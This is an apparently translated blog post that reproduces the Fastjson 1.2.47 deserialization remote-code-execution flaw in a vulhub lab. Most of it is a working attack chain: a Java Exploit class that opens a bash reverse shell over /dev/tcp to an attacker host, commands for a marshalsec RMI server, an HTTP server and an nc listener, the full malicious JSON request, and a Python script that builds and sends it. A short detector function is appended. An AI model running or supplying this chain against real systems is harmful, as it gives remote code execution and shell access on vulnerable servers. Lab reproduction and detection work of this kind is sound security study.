Fastjson 1.2.47 remote command execution vulnerability (reproduction)

Fastjson 1.2.47 can be exploited without autoType being enabled: a value whose @type is java.lang.Class makes Fastjson load the class named in "val" and put it in its class cache, so a second value whose @type names that cached class gets past the checkAutoType check. The payload used here then goes through a JNDI/RMI lookup, which only loads a remote class if the target JVM still allows it (com.sun.jndi.rmi.object.trustURLCodebase has defaulted to false since JDK 8u121); the vulhub environment used below satisfies that, which is why the chain ends in code execution. For a detailed analysis, see the article

https://www.freebuf.com/vuls/208339.html


Prerequisites (to avoid common pitfalls)

Before reproducing this vulnerability, it is best to first reproduce the Fastjson 1.2.24 deserialization vulnerability, because the two procedures are almost identical.

1. Use Java 1.8 (JDK 8). With a newer JDK the Exploit class may fail to compile, or the target's JDK 8 JVM will reject the class file because of its newer class-file version. Check with java -version.

2. All tools and the compiled class must be in the same directory (the HTTP server is started from that directory so that Exploit.class is served):

marshalsec-0.0.3-SNAPSHOT-all.jar

Exploit.java

Exploit.class


Environment setup

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

After the build finishes, the target is reachable at ip:8090.


Reproduction references

https://www.cnblogs.com/websecyw/p/11905014.html

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce


1. Get the exploit

git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE  

This exploit is simply a reverse-shell payload:

public class Exploit {
    public Exploit(){
        try{
            // Runtime.exec splits the command string on whitespace, so the
            // redirections are handed to an inner bash through "$@|bash".
            // Change 127.0.0.1/8888 to your vpsIP and the port nc listens on.
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    // main() only exists for testing the class locally; the JNDI Reference
    // path instantiates the class, so the constructor above is what fires.
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

2. vim Exploit.java and change the address and port to your vpsIP and listening port

3. javac Exploit.java to compile it into a class file


4. python -m SimpleHTTPServer 4444 starts the HTTP service (Python 2; with Python 3 use python3 -m http.server 4444). Run it in the directory that contains Exploit.class.

5. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vpsIP:4444/#Exploit" 9999 starts the malicious RMI server on port 9999; it answers lookups with a Reference whose codebase is http://vpsIP:4444/ and whose class is Exploit.


6. Listen with nc -lvnp 7777. The port must match the one written into Exploit.java (the sample code uses 8888, so change one of the two).

7. Send the PoC and the shell comes back.


The full request is given below; when using it, replace only the target IP in Host and the vpsIP:9999 address in dataSourceName. Content-Length must equal the length of the body actually sent after the placeholders are replaced (Burp Repeater updates it by default; with raw sockets or nc you have to recompute it).

POST / HTTP/1.1
Host: target-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 264

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vpsIP:9999/Exploit",
        "autoCommit":true
    }
}

8. The reverse shell connects back.
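As an added example (it is not part of the original post, the vulhub environment or the CaijiOrz exploit repository), the following Python script builds the same two-stage request as the packet above with a Content-Length computed from the actual body, sends it over a raw socket, and includes a small check that flags this payload shape in request bodies, for example when grepping web logs or writing a WAF rule. The target host/port, vpsIP and RMI port are command-line arguments; the class name Exploit is the one served by the RMI server above. Key order matters: the "a" entry must be parsed before "b" so that JdbcRowSetImpl is already in Fastjson's cache, and json.dumps preserves the dict's insertion order.

```python
import json
import socket
import sys


def build_payload(vps_ip: str, rmi_port: int, class_name: str = "Exploit") -> str:
    """Return the Fastjson 1.2.47 autoType-bypass body used on this page.

    "a" loads com.sun.rowset.JdbcRowSetImpl via java.lang.Class so it lands in
    Fastjson's class cache; "b" then instantiates it, and setting dataSourceName
    plus autoCommit triggers a JNDI lookup against the attacker's RMI server.
    """
    body = {
        "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
        "b": {
            "@type": "com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName": f"rmi://{vps_ip}:{rmi_port}/{class_name}",
            "autoCommit": True,
        },
    }
    # Compact separators: the body has no whitespace, so its length is exact.
    return json.dumps(body, separators=(",", ":"))


def build_request(target_host: str, vps_ip: str, rmi_port: int, path: str = "/") -> bytes:
    """Assemble a raw HTTP/1.1 POST with a Content-Length that matches the body."""
    body = build_payload(vps_ip, rmi_port).encode()
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {target_host}",
        "Content-Type: application/json",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def send_request(target_host: str, target_port: int, vps_ip: str, rmi_port: int,
                 timeout: float = 10.0) -> bytes:
    """Send the request over a plain socket and return the raw response bytes."""
    req = build_request(f"{target_host}:{target_port}", vps_ip, rmi_port)
    with socket.create_connection((target_host, target_port), timeout=timeout) as s:
        s.sendall(req)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def looks_like_1247_bypass(body: str) -> bool:
    """Crude detector for the pattern above (top-level keys only).

    Flags a body in which some java.lang.Class entry names a class via "val"
    and another entry then instantiates that same class with an rmi:// or
    ldap:// dataSourceName. Deeper nesting is not inspected.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict):
        return False
    cached = {
        v.get("val") for v in doc.values()
        if isinstance(v, dict) and v.get("@type") == "java.lang.Class"
    }
    for v in doc.values():
        if isinstance(v, dict) and v.get("@type") in cached:
            dsn = str(v.get("dataSourceName", ""))
            if dsn.startswith(("rmi://", "ldap://")):
                return True
    return False


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} target_host target_port vps_ip rmi_port")
    host, port, vps, rport = sys.argv[1], int(sys.argv[2]), sys.argv[3], int(sys.argv[4])
    # Example against the vulhub target: python3 poc.py 192.168.1.10 8090 vpsIP 9999
    print(send_request(host, port, vps, rport).decode(errors="replace"))
```

The response itself is not interesting (the target usually returns an error or an empty result once the JNDI lookup has fired); success is judged by the nc listener receiving the connection.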

Source: www.cnblogs.com/null1433/p/12697682.html